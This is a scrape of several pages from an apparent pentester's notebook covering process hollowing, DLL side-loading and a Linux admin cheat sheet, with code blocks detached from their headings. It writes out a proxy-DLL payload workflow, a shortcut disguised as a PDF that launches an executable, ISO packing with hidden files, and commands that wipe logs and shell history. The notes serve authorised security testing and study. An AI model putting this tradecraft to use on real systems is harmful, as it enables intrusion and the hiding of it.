rm -f /tmp/${SC_NAME}.{asm,obj} --- # Process Hollowing | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing.md) . [](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing#hollow-with-shellcode) Hollow with Shellcode -------------------------------------------------------------------------------------------------------------------------- * [https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs](https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs) * [https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/DinvokeProcessHollow.cs](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/DinvokeProcessHollow.cs) 1\. Create the target process (e. g., `svchost.exe`) in a suspended state. ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-1afd4eff0569f6db9031cee74a3e25567de9ecf3%252F004.png%3Falt%3Dmedia%26token%3Dcc444a75-0ed7-4ce0-93c3-bc1f631a1fdc&width=768&dpr=3&quality=100&sign=175b2671&sv=2) 2\. Query created process to extract its base address pointer from PEB (**P**rocess **E**nvironment **B**lock). ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-18b73d7a57b0a4c10d3e6c880a815773c314eb77%252F005.png%3Falt%3Dmedia%26token%3D98735902-f3ca-40ef-bd43-1956ec300fec&width=768&dpr=3&quality=100&sign=1581afa4&sv=2) 3\. Read 8 bytes of memory (for 64-bit architecture) pointed by the image base address _pointer_ in order to get the actual value of the image base address. ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-d68c1fef30f46da0496b547ff8cbbc0d3d8fee89%252F006.png%3Falt%3Dmedia%26token%3D8b1929cf-6ec8-4488-aebf-e75d4fc4e9c1&width=768&dpr=3&quality=100&sign=f9be3e48&sv=2) 4\. Read 0x200 bytes of the loaded EXE image and parse PE structure to get the EntryPoint address. ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-361d02e850c5f638837fb348241e39644198ad22%252F007.png%3Falt%3Dmedia%26token%3De0e527ab-d086-4875-93c0-408cc0bd650f&width=768&dpr=3&quality=100&sign=8becdbf1&sv=2) 5\. Write the shellcode to the EntryPoint address and resume thread execution. ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-b7cde1eb5cfadda607684069acaa748e4f1182e0%252F008.png%3Falt%3Dmedia%26token%3D5c96a4a6-0998-4914-9b08-bc60ae8af4b1&width=768&dpr=3&quality=100&sign=61522eaf&sv=2) [](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing#hollow-with-exe) Hollow with EXE -------------------------------------------------------------------------------------------------------------- * [https://github.com/m0n0ph1/Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing) * [https://gist.github.com/gnh1201/6a3836468c898f7ad3a3656e6f24dce3](https://gist.github.com/gnh1201/6a3836468c898f7ad3a3656e6f24dce3) * [https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations](https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations) Last updated 8 months ago * [Hollow with Shellcode](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing#hollow-with-shellcode) * [Hollow with EXE](https://ppn.snovvcra.sh/red-team/dev/code-injection/process-hollowing#hollow-with-exe) --- # NTP | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/ntp.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/ntp#ntp-amplification) NTP Amplification ------------------------------------------------------------------------------------------ Check: Copy $ ntpq -c rv 10.10.13.37 Last updated 4 years ago --- # DLL Hijacking | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking.md) . * [https://hijacklibs.net/](https://hijacklibs.net/) * [https://github.com/XForceIR/SideLoadHunter/tree/main/SideLoads](https://github.com/XForceIR/SideLoadHunter/tree/main/SideLoads) * [https://dec0ne.github.io/research/2021-04-26-DLL-Proxying-pt1/](https://dec0ne.github.io/research/2021-04-26-DLL-Proxying-pt1/) * [https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/](https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/) * [https://besteffortteam.it/onedrive-and-teams-dll-hijacking/](https://besteffortteam.it/onedrive-and-teams-dll-hijacking/) * [https://www.binarydefense.com/resources/blog/demystifying-dll-hijacking-understanding-the-intricate-world-of-dynamic-link-library-attacks/](https://www.binarydefense.com/resources/blog/demystifying-dll-hijacking-understanding-the-intricate-world-of-dynamic-link-library-attacks/) * [https://xss.is/threads/67021/](https://xss.is/threads/67021/) * [https://xss.is/threads/67718/](https://xss.is/threads/67718/) * [https://www.r-tec.net/r-tec-blog-dll-sideloading.html](https://www.r-tec.net/r-tec-blog-dll-sideloading.html) * [https://www.netspi.com/blog/technical-blog/adversary-simulation/adaptive-dll-hijacking/](https://www.netspi.com/blog/technical-blog/adversary-simulation/adaptive-dll-hijacking/) Print debug output from a DLL to a file: Print debug output from a DLL to dbgview: [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-side-loading-with-iso-packing) DLL Side-Loading with ISO Packing ------------------------------------------------------------------------------------------------------------------------------- * [https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/](https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/) * [https://blog.sunggwanchoi.com/recreating-an-iso-payload-for-fun-and-no-profit/](https://blog.sunggwanchoi.com/recreating-an-iso-payload-for-fun-and-no-profit/) * [https://github.com/ChoiSG/OneDriveUpdaterSideloading](https://github.com/ChoiSG/OneDriveUpdaterSideloading) Generate a proxy DLL with [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) : Create an exec link (also [here](https://gist.github.com/mttaggart/eb2ba020b8816cfe3da4cfd835240b7d) ): Pack all the files into an ISO with [PackMyPayload](https://github.com/mgeeky/PackMyPayload) : [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#unlock-dllmain) Unlock DllMain ----------------------------------------------------------------------------------------- * [https://elliotonsecurity.com/perfect-dll-hijacking/](https://elliotonsecurity.com/perfect-dll-hijacking/) * [https://github.com/ElliotKillick/LdrLockLiberator](https://github.com/ElliotKillick/LdrLockLiberator) * [https://elliotonsecurity.com/what-is-loader-lock/](https://elliotonsecurity.com/what-is-loader-lock/) * [https://habr.com/ru/articles/792424/](https://habr.com/ru/articles/792424/) [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#cve-2025-24076-cve-2025-24994) CVE-2025-24076, CVE-2025-24994 ------------------------------------------------------------------------------------------------------------------------ * [https://blog.compass-security.com/2025/04/3-milliseconds-to-admin-mastering-dll-hijacking-and-hooking-to-win-the-race-cve-2025-24076-and-cve-2025-24994/](https://blog.compass-security.com/2025/04/3-milliseconds-to-admin-mastering-dll-hijacking-and-hooking-to-win-the-race-cve-2025-24076-and-cve-2025-24994/) ### [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-proxying) DLL Proxying * [https://github.com/Flangvik/SharpDllProxy](https://github.com/Flangvik/SharpDllProxy) * [https://github.com/tothi/dll-hijack-by-proxying](https://github.com/tothi/dll-hijack-by-proxying) * [https://github.com/kagasu/ProxyDllGenerator](https://github.com/kagasu/ProxyDllGenerator) * [https://github.com/namazso/dll-proxy-generator](https://github.com/namazso/dll-proxy-generator) * [https://github.com/mrexodia/perfect-dll-proxy](https://github.com/mrexodia/perfect-dll-proxy) ### [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#shhhloader) Shhhloader * [https://github.com/icyguider/Shhhloader](https://github.com/icyguider/Shhhloader) ### [](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-forwardsideloading) DLL ForwardSideloading * [https://www.hexacorn.com/blog/2025/08/19/dll-forwardsideloading/](https://www.hexacorn.com/blog/2025/08/19/dll-forwardsideloading/) * [https://hexacorn.com/d/apis\_fwd.txt](https://hexacorn.com/d/apis_fwd.txt) Last updated 6 months ago * [DLL Side-Loading with ISO Packing](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-side-loading-with-iso-packing) * [Unlock DllMain](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#unlock-dllmain) * [CVE-2025-24076, CVE-2025-24994](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#cve-2025-24076-cve-2025-24994) * [DLL Proxying](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-proxying) * [Shhhloader](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#shhhloader) * [DLL ForwardSideloading](https://ppn.snovvcra.sh/red-team/dev/dll-hijacking#dll-forwardsideloading) Copy #ifdef _DEBUG #include #include #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__) #define DPRINT(...) { \ fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \ fprintf(stderr, __VA_ARGS__); \ } #else #define DPRINT(...) #endif Copy char buffer[256]; wsprintfA(buffer, "Hex: 0x%X, String: %s\n", 0x1234, "test"); OutputDebugStringA(buffer); Copy Cmd > SharpDllProxy.exe --dll C:\Windows\System32\version.dll --payload OneDrive.Update Cmd > move output_version\tmp1F94.dll C:\out\vresion.dll Copy $obj = New-object -ComObject wscript.shell $link = $obj.createshortcut("C:\Tools\PackMyPayload\out\clickme.lnk") $link.windowstyle = "7" $link.targetpath = "%windir%/system32/cmd.exe" $link.iconlocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13" # PDF ico $link.arguments = "/c start update.exe & ""%ProgramFiles(x86)%/Microsoft/Edge/Application/msedge.exe"" %cd%/fake.pdf" $link.save() Copy PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDriveStandaloneUpdater.exe,vresion.dll,version.dll,fake.pdf Copy $ ./Shhhloader.py -p RuntimeBroker.exe -d -dp vresion.dll -o version.dll -s domain -sa megacorp.local shellcode.bin --- # Linux | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/linux.md) . [](https://ppn.snovvcra.sh/admin/linux#encodings) Encodings ---------------------------------------------------------------- From CP1252 to UTF-8: Copy $ iconv -f CP1252 -t UTF8 inputfile.txt -o outputfile.txt Or $ enconv -x UTF8 somefile.txt Check: Copy $ enconv -d somefile.txt Or $ file -i somefile.txt Remove ANSI escape codes: Copy $ awk '{ gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' somefile.txt\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#windows-unix-text)\ \ Windows/Unix Text\ \ Copy\ \ input.txt: ASCII text\ VS\ input.txt: ASCII text, with CRLF line terminators\ \ From Win to Unix:\ \ Copy\ \ $ awk '{ sub("\r$", ""); print }' input.txt > output.txt\ Or\ $ dos2unix input.txt\ \ From Unix to Win:\ \ [](https://ppn.snovvcra.sh/admin/linux#network)\ \ Network\ \ \ ------------------------------------------------------------\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#connections)\ \ Connections\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#public-ip)\ \ Public IP\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#internet-speed)\ \ Internet Speed\ \ [](https://ppn.snovvcra.sh/admin/linux#virtual-terminal)\ \ Virtual Terminal\ \ \ ------------------------------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#process-kill)\ \ Process Kill\ \ \ ----------------------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#openssl)\ \ OpenSSL\ \ \ ------------------------------------------------------------\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#encrypt-decrypt)\ \ Encrypt/Decrypt\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#generate-keys)\ \ Generate Keys\ \ [](https://ppn.snovvcra.sh/admin/linux#gpg)\ \ GPG\ \ \ ----------------------------------------------------\ \ * [https://www.linode.com/docs/security/encryption/gpg-keys-to-send-encrypted-messages/](https://www.linode.com/docs/security/encryption/gpg-keys-to-send-encrypted-messages/)\ \ * [https://habr.com/ru/post/358182/](https://habr.com/ru/post/358182/)\ \ * [https://hackware.ru/?p=8215](https://hackware.ru/?p=8215)\ \ \ List keychain:\ \ Gen key:\ \ Gen revoke cert:\ \ Export user's public key:\ \ Import recipient's public key:\ \ Sign and encrypt:\ \ List recipients:\ \ Verify signature:\ \ Decrypt and verify:\ \ [](https://ppn.snovvcra.sh/admin/linux#cleanup)\ \ Cleanup\ \ \ ------------------------------------------------------------\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#log-files)\ \ Log Files\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#bash_history)\ \ .bash\_history\ \ * [https://askubuntu.com/a/832345](https://askubuntu.com/a/832345)\ \ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#zsh_history)\ \ .zsh\_history\ \ [](https://ppn.snovvcra.sh/admin/linux#secure-delete)\ \ Secure Delete\ \ \ ------------------------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#recover-deleted-files)\ \ Recover Deleted Files\ \ \ ----------------------------------------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#partitions)\ \ Partitions\ \ \ ------------------------------------------------------------------\ \ List devices:\ \ Manage partitions:\ \ Format:\ \ [](https://ppn.snovvcra.sh/admin/linux#floppy)\ \ Floppy\ \ \ ----------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#checksums)\ \ Checksums\ \ \ ----------------------------------------------------------------\ \ Compare file hashes:\ \ Compare directory hashes:\ \ [](https://ppn.snovvcra.sh/admin/linux#permissions)\ \ Permissions\ \ \ --------------------------------------------------------------------\ \ Set defaults for files:\ \ Set defaults for directories:\ \ [](https://ppn.snovvcra.sh/admin/linux#fix-linux-freezes-while-copying)\ \ Fix Linux Freezes while Copying\ \ \ ------------------------------------------------------------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#kernel)\ \ Kernel\ \ \ ----------------------------------------------------------\ \ Remove old kernels:\ \ [](https://ppn.snovvcra.sh/admin/linux#xfce4)\ \ Xfce4\ \ \ --------------------------------------------------------\ \ Install `xfce4`:\ \ [](https://ppn.snovvcra.sh/admin/linux#gifs)\ \ GIFs\ \ \ ------------------------------------------------------\ \ [](https://ppn.snovvcra.sh/admin/linux#ntp)\ \ NTP\ \ \ ----------------------------------------------------\ \ 1. [https://feeding.cloud.geek.nz/posts/time-synchronization-with-ntp-and-systemd/](https://feeding.cloud.geek.nz/posts/time-synchronization-with-ntp-and-systemd/)\ \ 2. [http://billauer.co.il/blog/2019/01/ntp-systemd/](http://billauer.co.il/blog/2019/01/ntp-systemd/)\ \ \ [](https://ppn.snovvcra.sh/admin/linux#imagemagick)\ \ ImageMagick\ \ \ --------------------------------------------------------------------\ \ XOR 2 images:\ \ [](https://ppn.snovvcra.sh/admin/linux#utilities-syntax)\ \ Utilities Syntax\ \ \ ------------------------------------------------------------------------------\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#tar)\ \ tar\ \ #### \ \ [](https://ppn.snovvcra.sh/admin/linux#tar-1)\ \ .tar\ \ Pack:\ \ Unpack:\ \ #### \ \ [](https://ppn.snovvcra.sh/admin/linux#tar.gz)\ \ .tar.gz\ \ Pack:\ \ Unpack:\ \ #### \ \ [](https://ppn.snovvcra.sh/admin/linux#tar.bz)\ \ .tar.bz\ \ Pack:\ \ Unpack:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#scp)\ \ scp\ \ Local file to a remote system:\ \ Remote file to a local system:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#id-7z)\ \ 7z\ \ Encrypt and pack all files in directory::\ \ Decrypt and unpack:\ \ Best compression:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#grep-find-sed)\ \ grep / find / sed\ \ Recursive grep:\ \ Recursive find and replace:\ \ Exec `strings` and grep on the result (with filenames):\ \ Find and `xargs` grep the results:\ \ Find and `xargs` less/grep the results:\ \ Enhanced variant using parallel and tre-agrep:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#readlink)\ \ readlink\ \ Get absolute path of a file:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#paste)\ \ paste\ \ Concatenate text files with a delimeter line by line:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#tmux)\ \ tmux\ \ Send a bunch of lines to a tmux pane:\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#dpkg)\ \ dpkg\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#veracrypt)\ \ veracrypt\ \ * [https://www.veracrypt.fr/en/Downloads.html](https://www.veracrypt.fr/en/Downloads.html)\ \ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#openconnect)\ \ openconnect\ \ #### \ \ [](https://ppn.snovvcra.sh/admin/linux#globalprotect)\ \ GlobalProtect\ \ Connect:\ \ Bypass HIP:\ \ * [https://www.infradead.org/openconnect/hip.html](https://www.infradead.org/openconnect/hip.html)\ \ * [https://gitlab.com/openconnect/openconnect/blob/master/trojans/hipreport.sh](https://gitlab.com/openconnect/openconnect/blob/master/trojans/hipreport.sh)\ \ \ [](https://ppn.snovvcra.sh/admin/linux#lamp)\ \ LAMP\ \ \ ------------------------------------------------------\ \ * [https://stackoverflow.com/a/46908573](https://stackoverflow.com/a/46908573)\ \ \ [](https://ppn.snovvcra.sh/admin/linux#fun)\ \ Fun\ \ \ ----------------------------------------------------\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#cmatrix)\ \ CMatrix\ \ ### \ \ [](https://ppn.snovvcra.sh/admin/linux#screenfetch)\ \ screenfetch\ \ Last updated 8 months ago\ \ * [Encodings](https://ppn.snovvcra.sh/admin/linux#encodings)\ \ * [Windows/Unix Text](https://ppn.snovvcra.sh/admin/linux#windows-unix-text)\ \ * [Network](https://ppn.snovvcra.sh/admin/linux#network)\ \ * [Connections](https://ppn.snovvcra.sh/admin/linux#connections)\ \ * [Public IP](https://ppn.snovvcra.sh/admin/linux#public-ip)\ \ * [Internet Speed](https://ppn.snovvcra.sh/admin/linux#internet-speed)\ \ * [Virtual Terminal](https://ppn.snovvcra.sh/admin/linux#virtual-terminal)\ \ * [Process Kill](https://ppn.snovvcra.sh/admin/linux#process-kill)\ \ * [OpenSSL](https://ppn.snovvcra.sh/admin/linux#openssl)\ \ * [Encrypt/Decrypt](https://ppn.snovvcra.sh/admin/linux#encrypt-decrypt)\ \ * [Generate Keys](https://ppn.snovvcra.sh/admin/linux#generate-keys)\ \ * [GPG](https://ppn.snovvcra.sh/admin/linux#gpg)\ \ * [Cleanup](https://ppn.snovvcra.sh/admin/linux#cleanup)\ \ * [Log Files](https://ppn.snovvcra.sh/admin/linux#log-files)\ \ * [.bash\_history](https://ppn.snovvcra.sh/admin/linux#bash_history)\ \ * [.zsh\_history](https://ppn.snovvcra.sh/admin/linux#zsh_history)\ \ * [Secure Delete](https://ppn.snovvcra.sh/admin/linux#secure-delete)\ \ * [Recover Deleted Files](https://ppn.snovvcra.sh/admin/linux#recover-deleted-files)\ \ * [Partitions](https://ppn.snovvcra.sh/admin/linux#partitions)\ \ * [Floppy](https://ppn.snovvcra.sh/admin/linux#floppy)\ \ * [Checksums](https://ppn.snovvcra.sh/admin/linux#checksums)\ \ * [Permissions](https://ppn.snovvcra.sh/admin/linux#permissions)\ \ * [Fix Linux Freezes while Copying](https://ppn.snovvcra.sh/admin/linux#fix-linux-freezes-while-copying)\ \ * [Kernel](https://ppn.snovvcra.sh/admin/linux#kernel)\ \ * [Xfce4](https://ppn.snovvcra.sh/admin/linux#xfce4)\ \ * [GIFs](https://ppn.snovvcra.sh/admin/linux#gifs)\ \ * [NTP](https://ppn.snovvcra.sh/admin/linux#ntp)\ \ * [ImageMagick](https://ppn.snovvcra.sh/admin/linux#imagemagick)\ \ * [Utilities Syntax](https://ppn.snovvcra.sh/admin/linux#utilities-syntax)\ \ * [tar](https://ppn.snovvcra.sh/admin/linux#tar)\ \ * [scp](https://ppn.snovvcra.sh/admin/linux#scp)\ \ * [7z](https://ppn.snovvcra.sh/admin/linux#id-7z)\ \ * [grep / find / sed](https://ppn.snovvcra.sh/admin/linux#grep-find-sed)\ \ * [readlink](https://ppn.snovvcra.sh/admin/linux#readlink)\ \ * [paste](https://ppn.snovvcra.sh/admin/linux#paste)\ \ * [tmux](https://ppn.snovvcra.sh/admin/linux#tmux)\ \ * [dpkg](https://ppn.snovvcra.sh/admin/linux#dpkg)\ \ * [veracrypt](https://ppn.snovvcra.sh/admin/linux#veracrypt)\ \ * [openconnect](https://ppn.snovvcra.sh/admin/linux#openconnect)\ \ * [LAMP](https://ppn.snovvcra.sh/admin/linux#lamp)\ \ * [Fun](https://ppn.snovvcra.sh/admin/linux#fun)\ \ * [CMatrix](https://ppn.snovvcra.sh/admin/linux#cmatrix)\ \ * [screenfetch](https://ppn.snovvcra.sh/admin/linux#screenfetch)\ \ \ Copy\ \ $ awk 'sub("$", "\r")' input.txt > output.txt\ Or\ $ unix2dos input.txt\ \ Copy\ \ $ netstat -anlp | grep LIST\ $ ss -nlpt | grep LIST\ \ Copy\ \ $ wget -q -O - https://ipinfo.io/ip\ $ curl ifconfig.me; echo\ $ dig +time=1 +tcp +tries=1 +short txt ch whoami.cloudflare @1.0.0.1 | tr -d '\"'\ \ Copy\ \ $ curl https://speedtest.selectel.ru/100MB -o/dev/null\ $ curl --connect-to ::speedtest.selectel.ru https://manifest.googlevideo.com/100MB -k -o/dev/null\ $ speedtest-cli\ \ Copy\ \ Start:\ CTRL + ALT + F1-6\ \ Stop:\ ALT + F8\ \ Copy\ \ $ ps aux | grep firefox\ Or\ $ pidof firefox\ \ $ kill -15 \ Or\ $ kill -SIGTERM \ Or\ $ kill \ \ If -15 signal didn't help, use stronger -9 signal:\ $ kill -9 \ Or\ $ kill -SIGKILL \ \ Copy\ \ $ openssl enc -e -aes-128-ecb -in file.txt -out file.txt.ecb -K 10101010\ $ openssl enc -d -aes-128-ecb -in file.txt.ecb -out file.txt.ecb_dec -K 10101010\ \ $ echo 'secret_data1 + secret_data2 + secret_data3' | openssl enc -e -aes-256-cbc -a -salt -md sha256 -iv 10101010 -pass pass:qwerty\ $ echo 'U2FsdGVkX1+d1qH1M3nhYFKscrg5QYt+AlTSBPHgdB4JEP8YSy1FX+xYdrfJ5cZgfoGrW+2On7lMxRIhKCUmWQ==' | openssl enc -d -aes-256-cbc -a -salt -md sha256 -iv 10101010 -pass pass:qwerty\ \ Copy\ \ $ ssh-keygen -t rsa -b 4096 -N 's3cr3t_p4ssw0rd' -C 'user@email.com' -f rsa_key\ $ mv rsa_key rsa_key.old\ $ openssl pkcs8 -topk8 -v2 des3 \\ -in rsa_key.old -passin 'pass:s3cr3t_p4ssw0rd' \\ -out rsa_key -passout 'pass:s3cr3t_p4ssw0rd'\ $ chmod 600 rsa_key\ \ $ openssl rsa -text -in rsa_key -passin 'pass:s3cr3t_p4ssw0rd'\ $ openssl asn1parse -in rsa_key\ \ $ ssh-keygen -o -a 100 -t ed25519 -f ~/.ssh/id_ed25519\ \ Copy\ \ $ gpg --list-keys\ \ Copy\ \ $ gpg --full-generate-key [--expert]\ \ Copy\ \ $ gpg --output revoke.asc --gen-revoke user@example.com\ revoke.asc\ \ Copy\ \ $ gpg --armor --output user.pub --export user@example.com\ user.pub\ \ Copy\ \ $ gpg --import recipient.pub\ \ Copy\ \ $ gpg -o/--output encrypted.txt.gpg -e/--encrypt -s/--sign -u/--local-user user1@example.com -r/--recipient user2@example.com plaintext.txt\ encrypted.txt.gpg\ \ Copy\ \ $ gpg --list-only -v -d/--decrypt encrypted.txt.gpg\ \ Copy\ \ $ gpg --verify signed.txt.gpg\ $ gpg --verify signed.txt.sig signed.txt\ \ Copy\ \ $ gpg -o/--output decrypted.txt -d/--decrypt --try-secret-key user1@example.com encrypted.txt.gpg\ $ gpg -o/--output decrypted.txt -d/--decrypt -u/--local-user user1@example.com -r/--recipient user2@example.com encrypted.txt.gpg\ \ Copy\ \ $ > logfile\ Or\ $ cat /dev/null > logfile\ Or\ $ dd if=/dev/null of=logfile\ Or\ $ truncate logfile --size 0\ \ Copy\ \ $ cat /dev/null > ~/.bash_history && history -c && exit\ $ history -c && history -w && exit\ $ rm -f ~/.bash_history && kill -9 $$\ \ Copy\ \ $ cat /dev/null > ~/.zsh_history && history -p && exit\ $ history -c && history -w && exit\ $ rm -f ~/.zsh_history && kill -9 $$\ \ Copy\ \ $ shred -zvu -n7 /path/to/file\ $ find /path/to/dir -type f -exec shred -zvu -n7 {} \;\ $ shred -zv -n0 /dev/sdc1\ \ Copy\ \ $ sudo grep -i -a -B100 -A100 'file contents to find' /dev/sda1 > recovered.bin\ $ strings recovered.bin\ \ Copy\ \ $ lsblk\ $ sudo fdisk -l\ $ df -h\ \ Copy\ \ $ sudo fdisk /dev/sd??\ \ Copy\ \ $ sudo umount /dev/sd??\ $ sudo mkfs. -F 32 -I /dev/sd?? -n VOLUME-NAME\ type: 'msdos' (=fat32), 'ntfs'\ \ Copy\ \ $ mcopy -i floppy.img 123.txt ::123.txt\ $ mdel -i floppy.img 123.TXT\ \ Copy\ \ $ md5sum /path/to/abc.txt | awk '{print $1, "/path/to/cba.txt"}' > /tmp/checksum.txt\ $ md5sum -c /tmp/checksum.txt\ \ Copy\ \ $ hashdeep -c md5 -r /path/to/dir1 > dir1hashes.txt\ $ hashdeep -c md5 -r -X -k dir1hashes.txt /path/to/dir2\ \ Copy\ \ $ find . -type f -exec chmod 644 {} \;\ \ Copy\ \ $ find . -type d -exec chmod 755 {} \;\ \ Copy\ \ $ sudo crontab -l | { cat; echo '@reboot echo $((16*1024*1024)) > /proc/sys/vm/dirty_background_bytes'; } | crontab -\ $ sudo crontab -l | { cat; echo '@reboot echo $((48*1024*1024)) > /proc/sys/vm/dirty_bytes'; } | crontab -\ \ Copy\ \ $ dpkg -l linux-image-\* | grep ^ii\ $ kernelver=$(uname -r | sed -r 's/-[a-z]+//')\ $ dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve $kernelver\ $ sudo apt-get purge $(dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve "$(uname -r | sed -r 's/-[a-z]+//')")\ \ Copy\ \ $ sudo apt update\ $ sudo apt upgrade -y\ $ sudo apt install xfce4 xfce4-terminal gtk2-engines-pixbuf -y\ \ Copy\ \ $ sudo apt install peek -y\ Or\ $ sudo apt install byzanz xdotool -y\ $ xdotool getmouselocation\ $ byzanz-record --duration=15 --x=130 --y=90 --width=800 --height=500 ~/Desktop/out.gif\ \ Copy\ \ $ sudo apt purge ntp -y\ $ sudo timedatectl set-timezone Europe/Moscow\ $ sudo vi /etc/systemd/timesyncd.conf\ NTP=0.ru.pool.ntp.org 1.ru.pool.ntp.org 2.ru.pool.ntp.org 3.ru.pool.ntp.org\ $ sudo service systemd-timesyncd restart\ $ sudo timedatectl set-ntp true\ $ timedatectl status\ $ service systemd-timesyncd status\ $ service systemd-timedated status\ \ Copy\ \ $ convert img1.png img2.png -fx "(((255*u)&(255*(1-v)))|((255*(1-u))&(255*v)))/255" img_out\ \ Copy\ \ tar -cvf directory.tar directory\ \ Copy\ \ tar -xvf directory.tar\ \ Copy\ \ tar -cvzf directory.tar.gz directory\ \ Copy\ \ tar -xvzf directory.tar.gz\ \ Copy\ \ tar -cvjf directory.tar.bz directory\ \ Copy\ \ tar -xvjf directory.tar.bz\ \ Copy\ \ $ scp [-P 2222] file.txt snovvcrash@10.10.13.37:/remote/directory\ \ Copy\ \ $ scp [-P 2222] snovvcrash@10.10.13.37:/remote/file.txt /local/directory\ \ Copy\ \ $ 7z a packed.7z -mhe -p"p4sSw0rD" *\ \ Copy\ \ $ 7z e packed.7z -p"p4sSw0rD"\ \ Copy\ \ $ 7z a -t7z -m0=lzma -mx=9 -mfb=64 -md=32m -ms=on files.7z files/\ \ Copy\ \ $ grep -nwr 'pattern' /path/to/dir\ \ Copy\ \ $ find . -type f -name "*.txt" -exec sed -i'' -e 's/\/bar/g' {} +\ \ 